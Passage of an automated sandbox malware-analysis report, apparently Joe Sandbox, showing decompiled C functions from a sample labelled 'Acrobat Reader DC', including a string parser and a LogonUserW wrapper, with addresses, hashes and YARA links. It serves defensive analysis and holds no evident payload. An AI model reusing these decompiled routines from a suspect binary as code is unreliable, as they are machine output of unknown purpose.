					_v28 = _t364;
					_v24 = _t364;
					_v20 = _t549;
					if(0 <= _t549) {
						L73:
						_push(8);
						_t365 = E004115D7(_t549, _t553, _t596);
						 *(_t553 + 0x10) = _t365;
						_t365[1] = _a4;
						_t366 =  *(_t553 + 0xc);
						 *( *(_t553 + 0x10)) = _t366;
						return _t366;
					} else {
						_t367 = _a8;
						_t549 = _t367 * 8 - _t367 + _t367 * 8 - _t367 + _t367 * 8 - _t367 + _t367 * 8 - _t367;
						_a8 = _t367 * 4;
						_t433 = _v28;
						_v32 = _t367 + 0xfffffffe;
						_t369 = _v20;
						do {
							_t497 =  *(_t433 + _t369 * 2) & 0x0000ffff;
							if(_t497 != 0x7c) {
								__eflags = _t497 - 0xa;
								if(_t497 == 0xa) {
									L47:
									 *(_t433 + _t369 * 2) = 0;
									 *((intOrPtr*)(_t549 +  *(_t553 + 0xc))) = _v24;
									_t371 = _v32;
									_t435 = _t371 + 1;
									 *((intOrPtr*)( *(_t553 + 0xc) + _t549 + 8)) = _t435;
									_v36 = _t435;
									 *((intOrPtr*)( *(_t553 + 0xc) + _t549 + 0xc)) = _t371;
									_t437 = _v8;
									 *((short*)( *(_t553 + 0xc) + _t549 + 0x18)) = 1;
									_t501 = 0;
									_t373 = 0;
									_v12 = 0;
									__eflags =  *_t437;
									if( *_t437 == 0) {
										L55:
										_v16 = _t501;
										_t502 = 0;
										__eflags = _t373;
										if(__eflags <= 0) {
											L61:
											E00434CC9(_t437, __eflags, _v8,  *(_t553 + 0xc) + _t549 + 0x10,  *(_t553 + 0xc) + _t549 + 0x1a);
											_t379 = _v12;
											 *( *(_t553 + 0xc) + _t549 + 0x14) = _t379;
											__eflags = _t379;
											if(__eflags == 0) {
												 *((intOrPtr*)(_a8 +  *((intOrPtr*)(_t553 + 8)))) = 0;
												 *((intOrPtr*)( *(_t553 + 0xc) + _t549 + 4)) = 0;
												L71:
												_t440 = _v20;
												_a8 = _a8 + 4;
												_v32 = _v36;
												_t369 = _t440;
												_t433 = _v28;
												_t549 = _t549 + 0x1c;
												__eflags = _t549;
												_v24 = _v28 + 2 + _t440 * 2;
												goto L72;
											}
											_push( ~(0 | __eflags > 0x00000000) | _t379 * 0x00000008);
											_t383 = E004115D7(_t549, _t553, __eflags);
											_t556 = _t556 + 4;
											__eflags = _v16;
											 *((intOrPtr*)(_a8 +  *((intOrPtr*)(_t553 + 8)))) = _t383;
											if(_v16 == 0) {
												L69:
												 *((intOrPtr*)( *(_t553 + 0xc) + _t549 + 4)) =  *((intOrPtr*)(_a8 +  *((intOrPtr*)(_t553 + 8))));
												goto L71;
											}
											_t448 = _v16;
											__eflags =  *_t448;
											_v24 = 0;
											_t385 = _t448;
											_v32 = 0;
											if(__eflags == 0) {
												L68:
												_t386 = E00434C09(_t448, __eflags, _t385);
												_t450 = _v24;
												 *((short*)( *((intOrPtr*)( *((intOrPtr*)(_t553 + 8)) + _a8)) + 4 + _t450 * 8)) = _t386;
												 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t553 + 8)) + _a8)) + _t450 * 8)) = 0;
												goto L69;
											}
											_t514 = _t448;
											_v12 = _t448;
											do {
												__eflags =  *_t514 - 0x3b;
												if(__eflags == 0) {
													 *_v12 = 0;
													_t389 = E00434C09(0, __eflags, _t385);
													_t453 = _v24;
													 *((short*)( *((intOrPtr*)( *((intOrPtr*)(_t553 + 8)) + _a8)) + 4 + _t453 * 8)) = _t389;
													 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t553 + 8)) + _a8)) + _t453 * 8)) = 0;
													_t385 = _v12 + 2;
													_t454 = _t453 + 1;
													__eflags = _t454;
													_v24 = _t454;
													_t448 = _v16;
												}
												_t516 = _v32 + 1;
												__eflags =  *((short*)(_t448 + _t516 * 2));
												_v32 = _t516;
												_t514 = _t448 + _t516 * 2;
												_v12 = _t514;
											} while (__eflags != 0);
											goto L68;
										} else {
											goto L56;
										}
										while(1) {
											L56:
											__eflags =  *((short*)(_t437 + _t502 * 2)) - 0x3b;
											if( *((short*)(_t437 + _t502 * 2)) == 0x3b) {
												break;
											}
											_t502 = _t502 + 1;
											__eflags = _t502 - _t373;
											if(__eflags < 0) {
												continue;
											}
											goto L61;
										}
										__eflags =  *(_t437 + 2 + _t502 * 2);
										 *((short*)(_t437 + _t502 * 2)) = 0;
										_t394 = _t437 + 2 + _t502 * 2;
										if(__eflags != 0) {
											_v16 = _t394;
										}
										goto L61;
									}
									_t521 = _t437;
									do {
										__eflags =  *_t521 - 0x3b;
										if( *_t521 == 0x3b) {
											__eflags = _t521[0];
											if(_t521[0] == 0) {
												__eflags = 0;
												 *_t521 = 0;
												_t437 = _v8;
											} else {
												_v12 = _v12 + 1;
											}
										}
										_t373 = _t373 + 1;
										__eflags =  *(_t437 + _t373 * 2);
										_t521 = _t437 + _t373 * 2;
									} while ( *(_t437 + _t373 * 2) != 0);
									_t501 = 0;
									__eflags = 0;
									goto L55;
								}
								__eflags = _t497;
								if(__eflags != 0) {
									goto L72;
								}
								goto L47;
							}
							 *(_t433 + _t369 * 2) = 0;
							_v8 = _t433 + 2 + _t369 * 2;
							L72:
							_t369 = _t369 + 1;
							_v20 = _t369;
							_t596 = _t369;
						} while (_t369 < 0);
						goto L73;
					}
				} else {
					do {
						if(_t548[_t352] != 0x20) {
							L4:
							_t473 = _t548[_t352] & 0x0000ffff;
							if(_t473 == 0x20) {
								L6:
								_a4 = _a4 + 1;
								 *((short*)( *((intOrPtr*)(_t553 + 4)))) = 0x7c;
								_t408 = 1;
								if(_t548[_t352] != 0x20) {
									L8:
									_t475 = _t548[_t352] & 0x0000ffff;
									if(_t475 == 0x20) {
										L11:
										 *( *((intOrPtr*)(_t553 + 4)) + _t408 * 2) = 0x3b;
										_t409 = _t408 + 1;
										if(_t548[_t352] != 0x20) {
											L13:
											if(_t548[_t352] == 0x28) {
												_t352 = _t352 + 1;
											}
											if(_t548[_t352] != 0x20) {
												L18:
												_a8 = 1;
												do {
													if(_t548[_t352] != 0x20) {
														L21:
														_t478 = _t548[_t352] & 0x0000ffff;
														if(_t478 == 0x3b) {
															L27:
															_t479 = 0;
															L28:
															if(_t548[_t352] != 0x20) {
																goto L30;
															} else {
																goto L29;
															}
															do {
																L29:
																_t352 = _t352 + 1;
															} while (_t548[_t352] == 0x20);
															goto L30;
														} else {
															goto L22;
														}
														do {
															L22:
															if(_t478 != 0x20) {
																L25:
																_t481 = _t548[_t352] & 0x0000ffff;
																if(_t481 == 0x29) {
																	_t479 = 0;
																	_a8 = 0;
																	_t352 = _t352 + 1;
																	goto L28;
																}
																goto L26;
															}
															do {
																_t352 = _t352 + 1;
															} while (_t548[_t352] == 0x20);
															goto L25;
															L26:
															_t352 = _t352 + 1;
															 *( *((intOrPtr*)(_t553 + 4)) + _t409 * 2) = _t481;
															_t478 = _t548[_t352] & 0x0000ffff;
															_t409 = _t409 + 1;
														} while (_t478 != 0x3b);
														goto L27;
													} else {
														goto L20;
													}
													do {
														L20:
														_t352 = _t352 + 1;
													} while (_t548[_t352] == 0x20);
													goto L21;
													L30:
													_t480 =  *((intOrPtr*)(_t553 + 4));
													_t544 = 0xa;
													if(_a8 != _t479) {
														_t544 = 0x3b;
													}
													 *((short*)(_t480 + _t409 * 2)) = _t544;
													_t409 = _t409 + 1;
													if(_t548[_t352] == 0x3b) {
														_t352 = _t352 + 1;
													}
												} while (_a8 == 1);
												goto L35;
											} else {
												do {
													_t352 = _t352 + 1;
												} while (_t548[_t352] == 0x20);
												goto L18;
											}
										} else {
											goto L12;
										}
										do {
											L12:
											_t352 = _t352 + 1;
										} while (_t548[_t352] == 0x20);
										goto L13;
									}
									while(_t475 != 0x28) {
										_t352 = _t352 + 1;
										 *( *((intOrPtr*)(_t553 + 4)) + _t408 * 2) = _t475;
										_t475 = _t548[_t352] & 0x0000ffff;
										_t408 = _t408 + 1;
										if(_t475 != 0x20) {
											continue;
										}
										goto L11;
									}
									goto L11;
								} else {
									goto L7;
								}
								do {
									L7:
									_t352 = _t352 + 1;
								} while (_t548[_t352] == 0x20);
								goto L8;
							} else {
								goto L5;
							}
							do {
								L5:
								_t352 = _t352 + 1;
								 *( *((intOrPtr*)(_t553 + 4)) + _t409 * 2) = _t473;
								_t473 = _t548[_t352] & 0x0000ffff;
								_t409 = _t409 + 1;
							} while (_t473 != 0x20);
							goto L6;
						} else {
							goto L3;
						}
						do {
							L3:
							_t352 = _t352 + 1;
						} while (_t548[_t352] == 0x20);
						goto L4;
						L35:
					} while (_t352 < _v28);
					goto L36;
				}
			}






























































                                  0x00444fd2
                                  0x00444fda
                                  0x00444fde
                                  0x00444fe2
                                  0x00444fe8
                                  0x00444ffc
                                  0x00445002
                                  0x00445005
                                  0x00445007
                                  0x0044500c
                                  0x00445016
                                  0x00445158
                                  0x0044515c
                                  0x0044515e
                                  0x0044515e
                                  0x0044515e
                                  0x0044515e
                                  0x00445175
                                  0x0044517b
                                  0x00445191
                                  0x00445192
                                  0x00445197
                                  0x0044519a
                                  0x004451a0
                                  0x004451a3
                                  0x004451a5
                                  0x004451ab
                                  0x004451ae
                                  0x004451b4
                                  0x004451ba
                                  0x004451c4
                                  0x004451cf
                                  0x004451d8
                                  0x004451df
                                  0x004451e5
                                  0x004451eb
                                  0x004451f1
                                  0x004451f7
                                  0x00445201
                                  0x0044520c
                                  0x00445218
                                  0x0044521c
                                  0x00445222
                                  0x00445227
                                  0x0044522a
                                  0x0044522d
                                  0x00445230
                                  0x00445239
                                  0x00445243
                                  0x0044524d
                                  0x00445253
                                  0x0044525d
                                  0x0044526c
                                  0x00445278
                                  0x0044527a
                                  0x00445281
                                  0x0044528d
                                  0x0044529b
                                  0x004452aa
                                  0x004452b4
                                  0x004452bc
                                  0x004452c8
                                  0x004452ce
                                  0x004452d8
                                  0x004452e3
                                  0x004452e9
                                  0x004452f3
                                  0x004452fd
                                  0x00445308
                                  0x00445314
                                  0x0044531b
                                  0x00445321
                                  0x0044532b
                                  0x00445331
                                  0x0044533b
                                  0x00445341
                                  0x0044534e
                                  0x0044535c
                                  0x0044536b
                                  0x00445375
                                  0x00445378
                                  0x00445378
                                  0x0044537b
                                  0x0044537e
                                  0x00445381
                                  0x00445384
                                  0x00445387
                                  0x0044538c
                                  0x004455c9
                                  0x004455c9
                                  0x004455cb
                                  0x004455d3
                                  0x004455d9
                                  0x004455df
                                  0x004455e4
                                  0x004455ea
                                  0x00445392
                                  0x00445392
                                  0x004453a7
                                  0x004453ac
                                  0x004453af
                                  0x004453b2
                                  0x004453b5
                                  0x004453b8
                                  0x004453b8
                                  0x004453bf
                                  0x004453de
                                  0x004453e1
                                  0x004453ec
                                  0x004453ee
                                  0x004453f8
                                  0x004453fb
                                  0x00445401
                                  0x00445404
                                  0x00445408
                                  0x0044540e
                                  0x00445415
                                  0x0044541d
                                  0x00445422
                                  0x00445424
                                  0x00445426
                                  0x00445429
                                  0x0044542c
                                  0x00445459
                                  0x00445459
                                  0x0044545c
                                  0x0044545e
                                  0x00445460
                                  0x00445485
                                  0x00445496
                                  0x0044549b
                                  0x004454a1
                                  0x004454a5
                                  0x004454a7
                                  0x0044558c
                                  0x00445596
                                  0x0044559e
                                  0x004455a1
                                  0x004455a7
                                  0x004455ab
                                  0x004455b2
                                  0x004455b4
                                  0x004455b7
                                  0x004455b7
                                  0x004455ba
                                  0x00000000
                                  0x004455ba
                                  0x004454bd
                                  0x004454be
                                  0x004454c9
                                  0x004454cc
                                  0x004454d0
                                  0x004454d3
                                  0x00445574
                                  0x00445580
                                  0x00000000
                                  0x00445580
                                  0x004454d9
                                  0x004454dc
                                  0x004454e0
                                  0x004454e7
                                  0x004454e9
                                  0x004454f0
                                  0x0044554d
                                  0x0044554e
                                  0x0044555c
                                  0x0044555f
                                  0x0044556d
                                  0x00000000
                                  0x0044556d
                                  0x004454f2
                                  0x004454f4
                                  0x004454f7
                                  0x004454f7
                                  0x004454fb
                                  0x00445503
                                  0x00445506
                                  0x00445514
                                  0x00445517
                                  0x00445525
                                  0x0044552f
                                  0x00445532
                                  0x00445532
                                  0x00445533
                                  0x00445536
                                  0x00445536
                                  0x0044553c
                                  0x0044553d
                                  0x00445542
                                  0x00445545
                                  0x00445548
                                  0x00445548
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00445462
                                  0x00445462
                                  0x00445462
                                  0x00445467
                                  0x00000000
                                  0x00000000
                                  0x00445469
                                  0x0044546a
                                  0x0044546c
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0044546e
                                  0x00445472
                                  0x00445478
                                  0x0044547c
                                  0x00445480
                                  0x00445482
                                  0x00445482
                                  0x00000000
                                  0x00445480
                                  0x0044542e
                                  0x00445432
                                  0x00445432
                                  0x00445436
                                  0x00445438
                                  0x0044543d
                                  0x00445444
                                  0x00445446
                                  0x00445449
                                  0x0044543f
                                  0x0044543f
                                  0x0044543f
                                  0x0044543d
                                  0x0044544c
                                  0x0044544d
                                  0x00445452
                                  0x00445452
                                  0x00445457
                                  0x00445457
                                  0x00000000
                                  0x00445457
                                  0x004453e3
                                  0x004453e6
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004453e6
                                  0x004453c3
                                  0x004453cb
                                  0x004455bd
                                  0x004455bd
                                  0x004455be
                                  0x004455c1
                                  0x004455c1
                                  0x00000000
                                  0x004453b8
                                  0x00445022
                                  0x00445022
                                  0x00445027
                                  0x00445031
                                  0x00445031
                                  0x00445038
                                  0x0044504c
                                  0x0044504f
                                  0x00445057
                                  0x0044505b
                                  0x00445061
                                  0x0044506b
                                  0x0044506b
                                  0x00445072
                                  0x0044508c
                                  0x00445094
                                  0x0044509d
                                  0x004450a4
                                  0x004450af
                                  0x004450b4
                                  0x004450b6
                                  0x004450b6
                                  0x004450bd
                                  0x004450cb
                                  0x004450cb
                                  0x004450d2
                                  0x004450d7
                                  0x004450e1
                                  0x004450e1
                                  0x004450e8
                                  0x00445119
                                  0x00445119
                                  0x0044511b
                                  0x00445120
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00445122
                                  0x00445122
                                  0x00445122
                                  0x00445123
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004450ea
                                  0x004450ea
                                  0x004450ee
                                  0x004450fa
                                  0x004450fa
                                  0x00445101
                                  0x004453d3
                                  0x004453d5
                                  0x004453d8
                                  0x00000000
                                  0x004453d8
                                  0x00000000
                                  0x00445101
                                  0x004450f2
                                  0x004450f2
                                  0x004450f3
                                  0x00000000
                                  0x00445107
                                  0x0044510a
                                  0x0044510b
                                  0x0044510f
                                  0x00445113
                                  0x00445114
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004450d9
                                  0x004450d9
                                  0x004450d9
                                  0x004450da
                                  0x00000000
                                  0x0044512a
                                  0x0044512d
                                  0x00445130
                                  0x00445135
                                  0x00445137
                                  0x00445137
                                  0x0044513c
                                  0x00445140
                                  0x00445146
                                  0x00445148
                                  0x00445148
                                  0x00445149
                                  0x00000000
                                  0x004450c2
                                  0x004450c2
                                  0x004450c2
                                  0x004450c4
                                  0x00000000
                                  0x004450c2
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004450a6
                                  0x004450a6
                                  0x004450a6
                                  0x004450a8
                                  0x00000000
                                  0x004450a6
                                  0x00445074
                                  0x0044507d
                                  0x0044507e
                                  0x00445082
                                  0x00445086
                                  0x0044508a
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0044508a
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00445063
                                  0x00445063
                                  0x00445063
                                  0x00445064
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0044503a
                                  0x0044503a
                                  0x0044503d
                                  0x0044503e
                                  0x00445042
                                  0x00445046
                                  0x00445047
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00445029
                                  0x00445029
                                  0x00445029
                                  0x0044502a
                                  0x00000000
                                  0x0044514f
                                  0x0044514f
                                  0x00000000
                                  0x00445022

                                  APIs
                                  • lstrlenW.KERNEL32(?), ref: 00444FE2
                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: _malloclstrlen
                                  • String ID:
                                  • API String ID: 3912106968-0
                                  • Opcode ID: bc9b0ddbf4b5e781b20acb7ddcbfad4671bbbf65b13e500264cab2747784ff8c
                                  • Instruction ID: 2480d25d2fe0455ab98e3fcd8ca22477dbce4471f789c2aae3ed6ffbbcb8a03f
                                  • Opcode Fuzzy Hash: bc9b0ddbf4b5e781b20acb7ddcbfad4671bbbf65b13e500264cab2747784ff8c
                                  • Instruction Fuzzy Hash: 89222B74A00A059FDB24CF19C080A6AF7F1FF98314F24C55ED85A8B7A6D775E892CB84
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00436CD7 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 58%
                                  			E00436CD7(WCHAR* _a4, WCHAR* _a8, WCHAR* _a12, signed char _a16, HANDLE* _a20) {
				signed int _t11;

				_t11 = LogonUserW(_a4, _a8, _a12, (_a16 & 0x00000002 | 0x00000004) >> 1, 0, _a20);
				asm("sbb eax, eax");
				return  ~( ~_t11);
			}




                                  0x00436cf9
                                  0x00436d01
                                  0x00436d06

                                  APIs
                                  • LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 00436CF9
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: LogonUser
                                  • String ID:
                                  • API String ID: 1244722697-0
                                  • Opcode ID: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                                  • Instruction ID: 7208d1371e48addad7a82bf776aec5a394cd9d1c10cc53d221989696c058f8f6
                                  • Opcode Fuzzy Hash: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                                  • Instruction Fuzzy Hash: 4DE0ECB626460EAFDB04CF68DC42EBF37ADA749710F004618BA16D7280C670E911CA74
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0042200C Relevance: 1.4, Strings: 1, Instructions: 180COMMONLIBRARYCODECrypto
                                  Download Yara Rule
                                  C-Code - Quality: 96%
                                  			E0042200C(char* _a4, intOrPtr _a8, signed int _a12) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				unsigned int* _t82;
				signed int _t83;
				unsigned int _t84;
				unsigned int _t88;
				signed int _t91;
				signed int _t93;
				unsigned int _t95;
				unsigned int _t97;
				signed int _t99;
				signed int _t101;
				signed int _t104;
				signed int _t108;
				unsigned int _t116;
				unsigned int _t117;
				unsigned int _t119;
				signed int _t121;
				signed int _t122;
				unsigned int _t125;
				unsigned int _t127;
				unsigned int _t129;
				unsigned int _t140;
				intOrPtr _t141;
				char _t144;
				void* _t145;

				_t82 = _a12;
				_t83 = 0;
				_v8 = 0x404e;
				 *_t82 = 0;
				_t82[1] = 0;
				_t82[2] = 0;
				if(_a8 <= 0) {
					L27:
					if(_t82[2] != _t83) {
						L31:
						_t122 = _t82[2];
						if((_t122 & 0x00008000) != 0) {
							L34:
							_t82[2] = _v8;
							return _t82;
						}
						_t91 = _t82[1];
						do {
							_t84 =  *_t82;
							_v8 = _v8 + 0xffff;
							_t122 = _t122 + _t122 | _t91 >> 0x0000001f;
							_t91 = _t91 + _t91 | _t84 >> 0x0000001f;
							 *_t82 = _t84 + _t84;
							_t82[1] = _t91;
							_t82[2] = _t122;
						} while ((_t122 & 0x00008000) == 0);
						goto L34;
					}
					_t108 = _t82[1];
					do {
						_t93 =  *_t82;
						_v8 = _v8 + 0xfff0;
						_t125 = _t108 >> 0x10;
						_t108 = _t108 << 0x00000010 | _t93 >> 0x00000010;
						_t82[1] = _t108;
						 *_t82 = _t93 << 0x10;
					} while (_t125 == _t83);
					_t82[2] = _t125;
					goto L31;
				} else {
					_t95 = 0;
					_a12 = 0;
					do {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t127 = _t95 + _t95;
						_t97 = _t83 + _t83 | _t95 >> 0x0000001f;
						_a12 = _a12 & 0x00000000;
						_v12 = _t127;
						_t99 = _t97 + _t97 | _t127 >> 0x0000001f;
						_t129 = _t99;
						_v12 = _t99;
						_t140 = _v12 + _v12;
						_t101 = (_a12 + _a12 | _t83 >> 0x0000001f) + (_a12 + _a12 | _t83 >> 0x0000001f) | _t97 >> 0x0000001f;
						_t116 = _v28 + _t140;
						 *_t82 = _t140;
						_t82[1] = _t129;
						_t82[2] = _t101;
						if(_t116 < _t140 || _t116 < _v28) {
							_a12 = 1;
						}
						 *_t82 = _t116;
						if(_a12 != 0) {
							_t147 = _v12;
							_a12 = _a12 & 0x00000000;
							_t26 = _t147 + 1; // 0x1
							_t129 = _t26;
							if(_t129 < _v12 || _t129 < 1) {
								_a12 = 1;
							}
							_t82[1] = _t129;
							if(_a12 != 0) {
								_t101 = _t101 + 1;
								_t82[2] = _t101;
							}
						}
						_t141 = _v24;
						_a12 = _a12 & 0x00000000;
						_t88 = _t129 + _t141;
						if(_t88 < _t129 || _t88 < _t141) {
							_a12 = 1;
						}
						_t82[1] = _t88;
						if(_a12 != 0) {
							_t101 = _t101 + 1;
							_t82[2] = _t101;
						}
						_v12 = _v12 & 0x00000000;
						_t104 = _t101 + _v20 + _t101 + _v20 | _t88 >> 0x0000001f;
						_t117 = _t116 + _t116;
						_t83 = _t88 + _t88 | _t116 >> 0x0000001f;
						_t82[2] = _t104;
						_v16 = _t104;
						_a12 = _t104;
						 *_t82 = _t117;
						_t82[1] = _t83;
						_t144 =  *_a4;
						_t95 = _t117 + _t144;
						_v28 = _t144;
						if(_t95 < _t117 || _t95 < _t144) {
							_v12 = 1;
						}
						 *_t82 = _t95;
						if(_v12 != 0) {
							_t51 = _t83 + 1; // 0x1
							_t119 = _t51;
							_t145 = 0;
							if(_t119 < _t83 || _t119 < 1) {
								_t145 = 1;
							}
							_t83 = _t119;
							_t82[1] = _t119;
							if(_t145 != 0) {
								_t121 = _v16 + 1;
								_a12 = _t121;
								_t82[2] = _t121;
							}
						}
						_a8 = _a8 - 1;
						_a4 = _a4 + 1;
						_t82[1] = _t83;
						_t82[2] = _a12;
					} while (_a8 > 0);
					_t83 = 0;
					goto L27;
				}
			}

































                                  0x00422014
                                  0x00422018
                                  0x0042201c
                                  0x00422023
                                  0x00422025
                                  0x00422028
                                  0x0042202e
                                  0x00422179
                                  0x0042217c
                                  0x004221a8
                                  0x004221a8
                                  0x004221b1
                                  0x004221e3
                                  0x004221e9
                                  0x004221ef
                                  0x004221ef
                                  0x004221b3
                                  0x004221b6
                                  0x004221b6
                                  0x004221b8
                                  0x004221cd
                                  0x004221d1
                                  0x004221d3
                                  0x004221d5
                                  0x004221d8
                                  0x004221db
                                  0x00000000
                                  0x004221b6
                                  0x0042217e
                                  0x00422181
                                  0x00422181
                                  0x00422183
                                  0x00422194
                                  0x00422197
                                  0x0042219c
                                  0x0042219f
                                  0x004221a1
                                  0x004221a5
                                  0x00000000
                                  0x00422034
                                  0x00422034
                                  0x00422036
                                  0x00422039
                                  0x0042203e
                                  0x0042203f
                                  0x00422040
                                  0x00422043
                                  0x0042204c
                                  0x00422051
                                  0x00422059
                                  0x0042206b
                                  0x0042206d
                                  0x0042206f
                                  0x00422078
                                  0x0042207d
                                  0x0042207f
                                  0x00422081
                                  0x00422083
                                  0x00422086
                                  0x0042208b
                                  0x00422092
                                  0x00422092
                                  0x0042209d
                                  0x0042209f
                                  0x004220a1
                                  0x004220a4
                                  0x004220a8
                                  0x004220a8
                                  0x004220ad
                                  0x004220b4
                                  0x004220b4
                                  0x004220bf
                                  0x004220c2
                                  0x004220c4
                                  0x004220c5
                                  0x004220c5
                                  0x004220c2
                                  0x004220c8
                                  0x004220cb
                                  0x004220cf
                                  0x004220d4
                                  0x004220da
                                  0x004220da
                                  0x004220e5
                                  0x004220e8
                                  0x004220ea
                                  0x004220eb
                                  0x004220eb
                                  0x004220f1
                                  0x004220fe
                                  0x00422105
                                  0x00422107
                                  0x00422109
                                  0x0042210c
                                  0x0042210f
                                  0x00422115
                                  0x00422117
                                  0x0042211a
                                  0x0042211d
                                  0x00422120
                                  0x00422125
                                  0x0042212b
                                  0x0042212b
                                  0x00422136
                                  0x00422138
                                  0x0042213a
                                  0x0042213a
                                  0x0042213d
                                  0x00422141
                                  0x0042214a
                                  0x0042214a
                                  0x0042214b
                                  0x0042214d
                                  0x00422152
                                  0x00422157
                                  0x00422158
                                  0x0042215b
                                  0x0042215b
                                  0x00422152
                                  0x0042215e
                                  0x00422164
                                  0x0042216b
                                  0x0042216e
                                  0x0042216e
                                  0x00422177
                                  0x00000000
                                  0x00422177

                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: N@
                                  • API String ID: 0-1509896676
                                  • Opcode ID: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                  • Instruction ID: 433aa61276291b0397d7e0efaabfbd78b7095b9e612e68cb1662ee3b8c9c8781
                                  • Opcode Fuzzy Hash: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                  • Instruction Fuzzy Hash: 48618E71A003259FCB18CF48D584AAEBBF2FF84310F5AC1AED9095B361C7B59955CB88
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004417BF Relevance: 49.8, APIs: 33, Instructions: 275COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 94%
                                  			E004417BF(intOrPtr _a4, struct HWND__** _a8) {
				signed int _v32;
				long _v36;
				struct tagRECT _v52;
				struct tagRECT _v68;
				void* _v72;
				WCHAR* _v76;
				struct HBRUSH__* _v80;
				long _v84;
				int _v88;
				long _v92;
				int _v96;
				void* _v100;
				void* __edi;
				void* __esi;
				signed int _t104;
				long _t106;
				long _t108;
				long _t111;
				void* _t113;
				WCHAR* _t127;
				struct HBRUSH__* _t160;
				signed int _t168;
				struct HWND__** _t169;
				int _t170;
				WCHAR* _t171;
				signed int _t191;
				struct HDC__* _t213;
				intOrPtr _t217;
				void* _t219;

				_t217 = _a4;
				if( *0x49751c == 0) {
					_t104 =  *(_t217 + 0x10);
					_t213 =  *(_t217 + 0x18);
					_t168 = _t104 & 0x00000006;
					_v52.right = _t104 & 0x00000010;
					_v32 = _t168;
					_v52.top.left = _t104 & 0x00000001;
					__eflags = _t168;
					if(_t168 == 0) {
						_t106 = _a8[0x12];
